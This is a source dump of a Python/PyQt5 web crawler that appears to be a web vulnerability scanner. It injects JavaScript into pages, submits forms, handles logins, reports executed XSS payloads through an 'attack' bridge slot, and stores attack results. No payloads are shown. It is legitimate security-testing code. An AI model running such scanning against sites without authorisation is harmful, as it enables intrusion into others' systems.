                logging.debug("Eval: {}".format(snippet+";"))
                self.mainFrame().evaluateJavaScript(snippet+";")
                self._wait(3)
                self.mainFrame().evaluateJavaScript(self._addEventListener)
                self._wait(3)
        else:
            #TODO: Implement way for sending forms without onsubmit-method
            # check between: target_form.evaluateJavaScript("Simulate or document.?form?.submit())
            # or submit_button click
            if q_submit_button is not None:
                logging.debug("Click on submit button...")
                q_submit_button.evaluateJavaScript("Simulate.click(this);")
                self._wait(3)
            else:
                logging.debug("Trigger submit event on form...")
                target_form.evaluateJavaScript("Simulate.submit(this);")
                self._wait(3)

        # Harvest the post-submit page state.
        links, clickables = extract_links(self.mainFrame(), url)
        forms = extract_forms(self.mainFrame())
        html = self.mainFrame().toHtml()
        #f = open("html.txt", "w")
        #f.write(html)
        #f.close()
        self.mainFrame().setHtml(None)
        self._new_clickables.extend(clickables)
        self._new_clickables = purge_dublicates(self._new_clickables)
        return EventResult.Ok, html, self._new_clickables, forms, links, []

    def jsWinObjClearedHandler(self): #Adding here the js-scripts corresponding to the phases
        # Re-inject helper JS and the jswrapper bridge whenever the page's
        # JS window object is reset (i.e. on every navigation).
        if not self._analyzing_finished:
            self.mainFrame().evaluateJavaScript(self._lib_js)
            self.mainFrame().evaluateJavaScript(self._md5)
            self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge)

    def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
        # Console output is intentionally suppressed during form handling.
        #logging.debug("Console(FormHandler): " + message + " at: " + str(lineNumber))
        pass

    def javaScriptAlert(self, frame, msg):
        # Swallow alert() dialogs; just log them.
        logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))

    def javaScriptConfirm(self, frame, msg):
        # Auto-accept confirm() dialogs so submission can proceed.
        logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
        return True

    def loadFinishedHandler(self, result):
        if not self._analyzing_finished: # Just to ignoring setting of non page....
            self._loading_complete = True
156 |
--------------------------------------------------------------------------------
/crawler/core/interactioncore.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | from PyQt5.Qt import QWebPage, QWebSettings
20 | from PyQt5.QtNetwork import QNetworkProxy, QNetworkRequest
21 | from PyQt5.QtCore import QSize, QUrl, QByteArray
22 |
23 | from time import time, sleep
24 | from core.jsbridge import JsBridge
25 | from models.clickable import Clickable
26 | from models.utils import CrawlSpeed
27 | import logging
28 |
class InteractionCore(QWebPage):
    '''
    This is the main class for interacting with a webpage, here are all necessary js-files loaded, and signal connections build
    '''
    def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None):
        """Set up the QWebPage, load the JS payloads and configure networking.

        :param parent: owner object; must expose ``.app`` (the QApplication).
        :param proxy: optional HTTP proxy host ("" disables the proxy).
        :param port: proxy port (0 disables the proxy).
        :param crawl_speed: CrawlSpeed value mapped to wait delays below.
        :param network_access_manager: optional shared QNetworkAccessManager.
        """
        QWebPage.__init__(self, parent)
        self.app = parent.app
        self._js_bridge = JsBridge(self)
        self.loadFinished.connect(self.loadFinishedHandler)
        self.mainFrame().javaScriptWindowObjectCleared.connect(self.jsWinObjClearedHandler)
        self.frameCreated.connect(self.frameCreatedHandler)
        self.setViewportSize(QSize(1024, 800))

        # Map the crawl-speed setting to polling/event delays in seconds.
        if crawl_speed == CrawlSpeed.Slow:
            self.wait_for_processing = 1
            self.wait_for_event = 2
        if crawl_speed == CrawlSpeed.Medium:
            self.wait_for_processing = 0.3
            self.wait_for_event = 1
        if crawl_speed == CrawlSpeed.Fast:
            self.wait_for_processing = 0.1
            self.wait_for_event = 0.5
        if crawl_speed == CrawlSpeed.Speed_of_Lightning:
            self.wait_for_processing = 0.01
            self.wait_for_event = 0.1

        # Load the JavaScript payloads injected into analyzed pages.
        # 'with' blocks guarantee the handles are closed even on read errors
        # (the previous open()/close() pairs leaked on exceptions).
        with open("js/lib.js", "r") as f:
            self._lib_js = f.read()

        with open("js/ajax_observer.js") as f:
            self._xhr_observe_js = f.read()

        with open("js/timing_wrapper.js") as f:
            self._timeming_wrapper_js = f.read()

        with open("js/ajax_interceptor.js") as f:
            self._xhr_interception_js = f.read()

        with open("js/addeventlistener_wrapper.js") as f:
            self._addEventListener = f.read()

        with open("js/md5.js") as f:
            self._md5 = f.read()

        with open("js/property_obs.js") as f:
            self._property_obs_js = f.read()

        enablePlugins = True
        loadImages = False  # kept for the commented-out AutoLoadImages toggle below
        self.settings().setAttribute(QWebSettings.PluginsEnabled, enablePlugins)
        self.settings().setAttribute(QWebSettings.JavaEnabled, enablePlugins)
        #self.settings().setAttribute(QWebSettings.AutoLoadImages, loadImages)
        self.settings().setAttribute(QWebSettings.DeveloperExtrasEnabled, True)
        self.settings().setAttribute(QWebSettings.JavascriptEnabled, True)
        self.settings().setAttribute(QWebSettings.JavascriptCanOpenWindows, True)

        if network_access_manager:
            self.setNetworkAccessManager(network_access_manager)

        if proxy != "" and port != 0:
            manager = self.networkAccessManager()
            p = QNetworkProxy(QNetworkProxy.HttpProxy, proxy, port, None, None)
            manager.setProxy(p)
            self.setNetworkAccessManager(manager)

        #Have to connect it here, otherwise I could connect it to the old one and then replaces it
        self.networkAccessManager().finished.connect(self.loadComplete)

    def analyze(self, html, requested_url, timeout = 20):
        """Abstract entry point; subclasses implement the actual analysis."""
        # Bugfix: 'raise NotImplemented()' attempted to call the
        # NotImplemented singleton, which raises TypeError instead of the
        # intended exception.
        raise NotImplementedError()

    def userAgentForUrl(self, url):
        # Present a fixed desktop-Chrome user agent for every request.
        return "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"

    def loadFinishedHandler(self, result):
        """Hook: page finished loading. No-op here; overridden by subclasses."""
        pass

    def frameCreatedHandler(self, frame):
        """Hook: a new (i)frame was created. No-op default."""
        pass

    def jsWinObjClearedHandler(self):
        """Hook: JS window object cleared (navigation). No-op default."""
        pass

    def javaScriptAlert(self, frame, msg):
        # Suppress alert() dialogs by default.
        pass

    def javaScriptConfirm(self, frame, msg):
        # Auto-accept confirm() dialogs by default.
        return True

    def javaScriptPrompt(self, *args, **kwargs):
        # Auto-accept prompt() dialogs by default.
        return True

    def _wait(self, waiting_time=1):
        """Busy-wait for *waiting_time* seconds while pumping the Qt event
        loop so page JS and network callbacks keep running.
        """
        deadline = time() + waiting_time
        while time() < deadline:
            sleep(0)
            self.app.processEvents()

    def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
        # Console output suppressed by default.
        #logging.debug("Console: " + message + " at: " + str(lineNumber))
        pass

    def loadComplete(self, reply):
        """Hook: a network reply finished. No-op default."""
        pass

    def add_eventlistener_to_element(self, msg):
        """Record a Clickable reported by the injected addEventListener
        wrapper. *msg* is a dict with keys 'addr', 'event', 'tag',
        'function_id' and optionally 'id' and 'class'.
        """
        #logging.debug(msg)
        if "id" in msg and msg['id'] != "":
            elem_id = msg['id']  # renamed from 'id' to avoid shadowing the builtin
        else:
            elem_id = None
        dom_address = msg['addr']
        event = msg['event']
        if event == "":
            event = None
        tag = msg['tag']
        if "class" in msg and msg['class'] != "":
            html_class = msg['class']
        else:
            html_class = None
        function_id = msg['function_id']
        if tag is not None and dom_address != "":
            tmp = Clickable(event, tag, dom_address, elem_id, html_class, function_id=function_id)
            if tmp not in self._new_clickables:
                self._new_clickables.append(tmp)


    def search_element_with_id(self, element_id):
        """Return the first DOM element matching #element_id, or None."""
        elem = self.mainFrame().findAllElements("#" + str(element_id))
        if len(elem) > 0:
            return elem[0] # maybe check if there is more than one element
        else:
            return None

    def search_element_with_class(self, cls, dom_adress):
        """Return the element with CSS class(es) *cls* whose XPath equals
        *dom_adress*, or None if no candidate matches.
        """
        css_cls_definition = ""
        classes = cls.split(" ")
        for cls in classes: #converting class names in css-compatible classnames
            cls = "." + cls
            css_cls_definition = css_cls_definition + cls + " "
        elems = self.mainFrame().findAllElements(css_cls_definition)
        for elem in elems:
            if dom_adress == elem.evaluateJavaScript("getXPath(this)"):
                return elem

    def search_element_without_id_and_class(self, dom_adress):
        """Walk the DOM along an XPath-like address (e.g.
        'html/body/div[2]/a') and return the element at that address, or
        None if the walk fails or the found element's XPath does not match.
        """
        check_dom_adress = dom_adress
        dom_address = dom_adress.split("/")
        current_element_in_dom = self.mainFrame().documentElement() #Is HTML-Element
        while len(dom_address) > 0 and current_element_in_dom is not None:
            target_tag_name = dom_address.pop(0) # Get and remove the first element
            target_tag_name = target_tag_name.upper()
            if len(target_tag_name) == 0:
                continue
            elif target_tag_name == "HTML": #or target_tag_name == "body":
                continue
            else:
                tmp = target_tag_name.find("[")
                if tmp > 0: # target_tag_name looks like tagname[index]
                    target_tag_name = target_tag_name.split("[")
                    index = int(target_tag_name[1].split("]")[0]) # get index out of target_tag_name
                    target_tag_name = target_tag_name[0] # target_tag_name name
                    last_child = current_element_in_dom.lastChild()
                    tmp_element = current_element_in_dom.findFirst(target_tag_name) # takes first child
                    if tmp_element.tagName() == target_tag_name: # if firstchild is from type of target_tag_name, subtrakt 1 from index
                        index -= 1
                    counter = 100 #Sometimes comparing with last child went wrong, therefore we have an backup fragment_counter
                    while index > 0 and tmp_element != last_child: # take next sibbling until index is 0, if target_tag_name is equal subtrakt one
                        tmp_element = tmp_element.nextSibling() #
                        if tmp_element.tagName() == target_tag_name:
                            index -= 1
                        counter -= 1
                        if counter == 0: #If fragment_counter 0 then break, we wont find it anymore
                            current_element_in_dom = None
                            break
                    if index == 0 and tmp_element.tagName() == target_tag_name:
                        current_element_in_dom = tmp_element
                    else: #We miss the element
                        current_element_in_dom = None
                else: #target_tag_name is the only of his type, or the first...is die hell
                    tmp_element = current_element_in_dom.firstChild()
                    last_child = current_element_in_dom.lastChild()
                    counter = 100
                    # NOTE(review): the loop condition already excludes a tag
                    # match, so the 'if' branch inside can never fire; the
                    # real exit happens via the post-loop check below.
                    while tmp_element.tagName() != target_tag_name and tmp_element != last_child and counter > 0:
                        #logging.debug(tmp_element.tagName())
                        counter -= 1
                        if tmp_element.tagName() == target_tag_name:
                            current_element_in_dom = tmp_element
                            break
                        else:
                            tmp_element = tmp_element.nextSibling()
                    if tmp_element.tagName() != target_tag_name or counter == 0:
                        current_element_in_dom = None
                    else:
                        current_element_in_dom = tmp_element

        tmp_element = None
        last_child = None
        dom_address = None

        if current_element_in_dom is None:
            return None
        if current_element_in_dom.evaluateJavaScript("getXPath(this)") != check_dom_adress:
            logging.debug("Element not found: " + str(current_element_in_dom.evaluateJavaScript("getXPath(this)")) + " : " + str(check_dom_adress))
            return None
        else:
            return current_element_in_dom


    def make_request(self, url):
        """Build a QNetworkRequest for *url*."""
        request = QNetworkRequest()
        request.setUrl(QUrl(url))
        return request

    def post_data_to_array(self, post_data):
        """Encode a dict of POST parameters (values may be strings or lists
        of strings) as an '&'-joined QByteArray, without a trailing '&'.
        """
        post_params = QByteArray()
        for (key, value) in post_data.items():
            if isinstance(value, list):
                for val in value:
                    post_params.append(key + "=" + val + "&")
            else:
                post_params.append(key + "=" + value + "&")
        post_params.remove(post_params.length() - 1, 1)
        return post_params
--------------------------------------------------------------------------------
/crawler/core/jaekcore.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
import logging
import sys
import time
from asyncio.tasks import sleep
from copy import deepcopy

from PyQt5.Qt import QApplication, QObject
from PyQt5.QtNetwork import QNetworkAccessManager

from analyzer.mainanalyzer import MainAnalyzer
from core.eventexecutor import EventResult, EventExecutor
from core.formhandler import FormHandler
from models.webpage import WebPage
from utils.asyncrequesthandler import AsyncRequestHandler
from utils.execptions import LoginFailed
from utils.utils import count_cookies, calculate_similarity_between_pages
31 |
32 | __author__ = 'constantin'
33 |
class JaekCore(QObject):
    """Shared base for the crawler/attacker: owns the QApplication, the
    analyzers (event executor, dynamic analyzer, form handler) and all
    login/relogin handling.

    Bugfix note: the module imports ``sleep`` from ``asyncio.tasks``, which
    is a *coroutine function*; the previous ``sleep(2000)`` calls only
    created never-awaited coroutine objects and therefore never delayed
    anything. They are replaced below with real blocking ``time.sleep(2)``
    retry delays (2000 was presumably meant as milliseconds).
    """


    def __init__(self, config, proxy="", port=0, database_manager=None):
        QObject.__init__(self)
        self.app = QApplication(sys.argv)
        self._network_access_manager = QNetworkAccessManager(self)
        self.user = None
        self.proxy = proxy
        self.port = port
        self.config = config
        self.database_manager = database_manager
        self.domain_handler = None
        self.process_with_login = False
        self.async_request_handler = AsyncRequestHandler(self.database_manager)

        # All three analyzers share one network access manager so that
        # cookies and sessions are consistent across them.
        self._event_executor = EventExecutor(self, proxy, port, crawl_speed=config.process_speed,
                                             network_access_manager=self._network_access_manager)
        self._dynamic_analyzer = MainAnalyzer(self, proxy, port, crawl_speed=config.process_speed,
                                              network_access_manager=self._network_access_manager)
        self._form_handler = FormHandler(self, proxy, port, crawl_speed=config.process_speed,
                                         network_access_manager=self._network_access_manager)

        self.cookie_num = -1  # cookie count right after a successful login; -1 = unknown
        self.interactive_login_form_search = False

    def _find_form_with_special_parameters(self, page, login_data, interactive_search=True):
        """Find the form on *page* containing both login parameter names.

        Assumes *login_data* has at least two keys (username and password
        field names). If the form is not directly on the page and
        *interactive_search* is set, every clickable is executed to see if
        it reveals the form.

        :return: (form, clickable_that_revealed_it_or_None) or (None, None).
        """
        keys = list(login_data.keys())
        data1 = keys[0]
        data2 = keys[1]
        for form in page.forms:
            if form.toString().find(data1) > -1 and form.toString().find(data2) > -1:
                return form, None
        if interactive_search:
            for clickable in page.clickables:
                tmp_page = deepcopy(page)
                event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable)
                if delta_page is None:
                    time.sleep(2)  # real delay before the single retry (see class docstring)
                    event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable)
                    if delta_page is None:
                        continue
                delta_page = self.domain_handler.complete_urls_in_page(delta_page)
                delta_page = self.domain_handler.analyze_urls(delta_page)
                if event_state == EventResult.Ok:
                    for form in delta_page.forms:
                        if form.toString().find(data1) > -1 and form.toString().find(data2) > -1:
                            return form, clickable
        return None, None

    def _initial_login(self):
        """Perform the very first login and remember the resulting cookie
        count as the logged-in baseline.

        :return: (True, used_click) on success.
        :raises LoginFailed: if the form cannot be found or login fails.
        """
        logging.debug("Initial Login...")
        self._page_with_loginform_logged_out = self._get_webpage(self.user.url_with_login_form)
        num_of_cookies_before_login = count_cookies(self._network_access_manager, self.user.url_with_login_form)
        logging.debug("Number of cookies before initial login: {}".format(num_of_cookies_before_login))
        self._login_form, login_clickables = self._find_form_with_special_parameters(self._page_with_loginform_logged_out, self.user.login_data)
        if self._login_form is None:
            # Dump the page for post-mortem inspection before giving up.
            f = open("No_login_form.txt", "w")
            f.write(self._page_with_loginform_logged_out.html)
            f.close()
            raise LoginFailed("Cannot find Login form, please check the parameters...")

        page_after_login = self._login_and_return_webpage(self._login_form, self._page_with_loginform_logged_out, self.user.login_data, login_clickables)
        if page_after_login is None:
            raise LoginFailed("Cannot load loginpage anymore...stop...")
        # Heuristic: a successful login changes the page substantially.
        login_successfull = calculate_similarity_between_pages(self._page_with_loginform_logged_out, page_after_login) < 0.5
        if login_successfull:
            num_cookies_after_login = count_cookies(self._network_access_manager, self.user.url_with_login_form)
            if num_cookies_after_login > num_of_cookies_before_login:
                self.cookie_num = num_cookies_after_login
            logging.debug("Initial login successfull!")
            if login_clickables is not None:
                return True, True # If we login with a click
            else:
                return True, False # If we don't login with a click
        raise LoginFailed("Cannot login, sorry...")

    def _login_and_return_webpage(self, login_form, page_with_login_form=None, login_data=None, login_clickable= None):
        """Submit *login_form* (optionally revealed by *login_clickable*)
        and return the resulting WebPage, or None on failure.
        """
        if page_with_login_form is None:
            page_with_login_form = self._page_with_loginform_logged_out
        try:
            if login_clickable is not None:
                tmp_page = deepcopy(page_with_login_form)
                event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable)
                if event_state == EventResult.ErrorWhileInitialLoading:
                    time.sleep(2)  # real delay before the single retry (see class docstring)
                    event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable)
                    if event_state == EventResult.ErrorWhileInitialLoading:
                        logging.debug("Two time executing fails.. stop crawling")
                        return None
            self.domain_handler.complete_urls_in_page(page_with_login_form)
            self.domain_handler.analyze_urls(page_with_login_form)
            self.async_request_handler.handle_requests(page_with_login_form)
            logging.debug("Start submitting login form...")
            # submit_form's error paths return a 2-tuple; unpacking it into
            # six names then raises ValueError, which is caught below.
            response_code, html_after_timeouts, new_clickables, forms, links, timing_requests = self._form_handler.submit_form(login_form, page_with_login_form, login_data)
        except ValueError:
            return None
        #TODO: Put building of Webpage inside submit function
        page_after_login = WebPage(-1, page_with_login_form.url, html_after_timeouts)
        page_after_login.clickables = new_clickables
        page_after_login.links = links
        page_after_login.timing_requests = timing_requests
        page_after_login.forms = forms
        self.domain_handler.complete_urls_in_page(page_after_login)
        self.domain_handler.analyze_urls(page_after_login)
        self.async_request_handler.handle_requests(page_after_login)
        return page_after_login

    def _handle_possible_logout(self):
        """
        Handles a possible logout
        :return: True is we were not logged out and false if we were logged out
        :raises LoginFailed: if relogin keeps failing after max_retries.
        """
        retries = 0
        max_retries = 3
        while retries < max_retries:
            logging.debug("Start with relogin try number: {}".format(retries+1))
            page_with_login_form = self._get_webpage(self.user.url_with_login_form)
            login_form, login_clickable = self._find_form_with_special_parameters(page_with_login_form, self.user.login_data, self.interactive_login_form_search)
            if login_form is not None:
                #So login_form is visible, we are logged out
                logging.debug("Logout detected, visible login form...")
                hopefully_reloggedin_page = self._login_and_return_webpage(login_form, page_with_login_form, self.user.login_data, login_clickable)
                if hopefully_reloggedin_page is None:
                    retries += 1
                    logging.debug("Relogin attempt number {} failed".format(retries))
                    time.sleep(2)  # real delay between relogin attempts (see class docstring)
                else:
                    login_form, login_clickable = self._find_form_with_special_parameters(hopefully_reloggedin_page, self.user.login_data)
                    if login_form is None:
                        logging.debug("Relogin successfull...continue")
                        return False
                    else:
                        logging.debug("Relogin fails, loginform is still present...")
                        retries += 1
                        time.sleep(2)
            else:
                logging.debug("Login form is not there... we can continue (I hope)")
                # Consistency fix: compare against max_retries, not literal 3.
                if retries < max_retries:
                    return True
                else:
                    return False
        raise LoginFailed("We cannot login anymore... stop crawling here")


    def _get_webpage(self, url):
        """Fetch and dynamically analyze *url*, returning the WebPage."""
        response_code, result = self._dynamic_analyzer.analyze(url, timeout=10)
        self.domain_handler.complete_urls_in_page(result)
        self.domain_handler.analyze_urls(result)
        self.async_request_handler.handle_requests(result)
        return result

    def _check_login_status_with_cookies(self):
        """Cheap logged-in check: the current cookie count must not have
        dropped below the baseline captured at login time. Returns True
        when no baseline is known yet.
        """
        if self.cookie_num > 0:
            current_cookie_num = count_cookies(self._network_access_manager, self.user.url_with_login_form)
            return current_cookie_num >= self.cookie_num
        return True
191 |
--------------------------------------------------------------------------------
/crawler/core/jsbridge.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import json
19 | from PyQt5.QtCore import QObject, pyqtSlot
20 |
21 | __author__ = 'constantin'
22 |
class JsBridge(QObject):
    """Qt-to-JavaScript bridge.

    Exposed to page JS (as 'jswrapper'); the injected helper scripts call
    these slots to report DOM event listeners, XHR activity, timer
    registrations and XSS payload hits back to the owning analyzer.
    """

    def __init__(self, analyzer):
        QObject.__init__(self)
        self.analyzer = analyzer
        self._ajax_request = []  # open()ed XHRs waiting for their send()

    @pyqtSlot(str)
    def add_eventListener_to_element(self, msg):
        """Report a registered DOM event listener (JSON payload)."""
        self.analyzer.add_eventlistener_to_element(json.loads(msg))

    @pyqtSlot(str)
    def xmlHTTPRequestOpen(self, msg):
        """Queue an XHR open() call until its matching send() arrives."""
        self._ajax_request.append(json.loads(msg))

    @pyqtSlot(str)
    def xmlHTTPRequestSend(self, msg):
        """Pair an XHR send() with the oldest queued open() and forward it."""
        send_info = json.loads(msg)
        according_open = self._ajax_request.pop(0)
        try:
            according_open['parameters'] = send_info['parameters'][0]
        except IndexError:
            # send() carried no body.
            according_open['parameters'] = ""
        self.analyzer.capturing_requests(according_open)

    @pyqtSlot(str)
    def timeout(self, msg):
        """Report a setTimeout() registration."""
        call = json.loads(msg)
        call['type'] = "timeout"
        self.analyzer.capture_timeout_call(call)

    @pyqtSlot(str)
    def intervall(self, msg):
        """Report a setInterval() registration."""
        call = json.loads(msg)
        call['type'] = "intervall"
        #logging.debug(call)
        self.analyzer.capture_timeout_call(call)

    @pyqtSlot(str)
    def add_eventlistener_to_element(self, msg):
        """Lowercase alias slot used by other injected scripts."""
        #logging.debug(msg)
        self.analyzer.add_eventlistener_to_element(json.loads(msg))

    @pyqtSlot(str)
    def attack(self, msg):
        """Report that an injected XSS payload executed."""
        self.analyzer.xss_callback(msg)
--------------------------------------------------------------------------------
/crawler/database/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
--------------------------------------------------------------------------------
/crawler/database/databasemanager.py:
--------------------------------------------------------------------------------
1 | """
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 |
17 | This Class is responsible for storage related things
18 |
19 | """
20 | from database.database import Database
21 | from models.clickabletype import ClickableType
22 |
23 |
class DatabaseManager(object):
    """Facade in front of Database: scopes every query to the current
    session and keeps small MRU caches of recently stored pages."""

    def __init__(self, user, dropping=True):
        self._database = Database(user.username, dropping)
        self._database.insert_user_into_db(user)
        self._web_page_cache = []
        self._deltapage_cache = []
        self.MAX_CACHE_SIZE = 0  # 0 disables caching
        self._current_session = user.session

    def _remember(self, cache, page):
        """Insert *page* at the front of *cache*, evicting the oldest entry
        once MAX_CACHE_SIZE is reached. No-op when caching is disabled."""
        if self.MAX_CACHE_SIZE > 0:
            if len(cache) >= self.MAX_CACHE_SIZE:
                del cache[-1]
            cache.insert(0, page)

    def return_session_id_to_username(self, username):
        """Look up the stored user record for *username*."""
        return self._database.get_user_to_username(username)

    def store_web_page(self, web_page):
        """Cache and persist a crawled web page."""
        self._remember(self._web_page_cache, web_page)
        self._database.insert_page_into_db(self._current_session, web_page)

    def get_page_to_id(self, page_id):
        """Return the web page or delta page with *page_id*, or None."""
        for lookup in (self.get_web_page_to_id, self.get_delta_page_to_id):
            page = lookup(page_id)
            if page is not None:
                return page
        return None

    def store_delta_page(self, delta_page):
        """Cache and persist a delta page."""
        self._remember(self._deltapage_cache, delta_page)
        self._database.insert_delta_page_into_db(self._current_session, delta_page)

    def get_page_to_url(self, url):
        """Fetch the stored web page for *url* (QUrl or string)."""
        try:
            url = url.toString()
        except AttributeError:
            pass  # already a plain string
        return self._database.get_webpage_to_url_from_db(self._current_session, url)

    def get_web_page_to_id(self, page_id):
        """Return the cached or stored web page with *page_id*."""
        for cached in self._web_page_cache:
            if page_id == cached.id:
                return cached
        return self._database.get_webpage_to_id_from_db(self._current_session, page_id)

    def get_delta_page_to_id(self, delta_page_id):
        """Return the cached or stored delta page with *delta_page_id*."""
        for cached in self._deltapage_cache:
            if delta_page_id == cached.id:
                return cached
        return self._database.get_delta_page_to_id(self._current_session, delta_page_id)

    def url_exists(self, url):
        """True if *url* is already known in this session."""
        return self._database.url_exists(self._current_session, url)

    def get_next_url_for_crawling(self):
        """Pop the next URL to crawl for this session."""
        return self._database.get_next_url_for_crawling(self._current_session)

    def get_all_unvisited_urls_sorted_by_hash(self):
        return self._database.get_all_unvisited_urls_sorted_by_hash(self._current_session)

    def insert_url_into_db(self, url):
        return self._database.insert_url_into_db(self._current_session, url)

    def insert_redirected_url(self, url):
        """Store *url* flagged as the target of a redirect."""
        return self._database.insert_url_into_db(self._current_session, url, is_redirected_url=True)

    def visit_url(self, url, webpage_id, response_code, redirected_to = None):
        """Mark *url* as visited with its response code and page id."""
        self._database.visit_url(self._current_session, url, webpage_id, response_code, redirected_to)

    def extend_ajax_requests_to_webpage(self, webpage, ajax_reuqests):
        # Parameter name keeps the historical spelling for keyword callers.
        self._database.extend_ajax_requests_to_webpage(self._current_session, webpage, ajax_reuqests)

    def get_all_crawled_delta_pages(self, url=None):
        return self._database.get_all_crawled_deltapages_to_url_from_db(self._current_session, url)

    def update_clickable(self, web_page_id, clickable):
        """Persist a clickable's outcome; ignored/unsupported ones are
        recorded separately from successfully clicked ones."""
        if clickable.clickable_type in (ClickableType.IgnoredByCrawler, ClickableType.UnsupportedEvent):
            self._database.set_clickable_ignored(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type)
        else:
            self._database.set_clickable_clicked(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type, clickable.links_to)

    def get_url_structure(self, hash):
        return self._database.get_url_structure_from_db(self._current_session, hash)

    def insert_url_structure(self, url_description):
        self._database.insert_url_structure_into_db(self._current_session, url_description)

    def get_all_pages(self):
        return self._database.get_all_pages(self._current_session)

    def get_url_structure_to_hash(self, url_hash):
        return self._database.get_url_structure_from_db(self._current_session, url_hash)

    def insert_url_structure_into_db(self, url_description):
        self._database.insert_url_structure_into_db(self._current_session, url_description)

    def get_url_to_id(self, id):
        return self._database.get_url_to_id(self._current_session, id)

    def write_clusters(self, url_hash, clusters):
        self._database.write_cluster(self._current_session, url_hash, clusters)

    def get_clusters(self, url_hash):
        return self._database.get_clusters(self._current_session, url_hash)

    def count_visited_url_per_hash(self, url_hash):
        return self._database.count_visited_urls_per_hash(self._current_session, url_hash)

    def get_all_url_structures(self):
        return self._database.get_all_url_structures(self._current_session)

    def get_all_visited_urls(self):
        return self._database.get_all_successfully_visited_urls(self._current_session)

    def get_one_visited_url_per_structure(self):
        return self._database.get_one_visited_url_per_structure(self._current_session)

    def insert_attack_result(self, result, attack_url):
        self._database.insert_attack_result(self._current_session, result, attack_url)

    def get_asyncrequest_structure(self, structure_hash=None):
        return self._database.get_asyncrequest_structure(self._current_session, structure_hash)

    def get_all_get_forms(self):
        return self._database.get_all_get_forms(self._current_session)

    def get_one_form_per_destination(self):
        return self._database.get_one_form_per_destination(self._current_session)

    def num_of_ignored_urls(self, url_hash):
        return self._database.num_of_ignored_urls(self._current_session, url_hash)

    def url_visited(self, url):
        return self._database.url_visited(self._current_session, url)

    def get_id_to_url(self, url):
        return self._database.get_id_to_url(self._current_session, url)

    def get_all_urls_to_domain(self, domain):
        return self._database.get_all_urls_to_domain(self._current_session, domain)
/crawler/example.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import logging
19 |
20 | from attacker import Attacker
21 | from crawler import Crawler
22 | from database.databasemanager import DatabaseManager
23 | from utils.config import CrawlConfig, AttackConfig
24 | from models.utils import CrawlSpeed
25 | from utils.user import User
26 | import csv
27 | from utils.utils import calculate_similarity_between_pages
28 |
# Log to the console at DEBUG level; uncomment filename/filemode below to
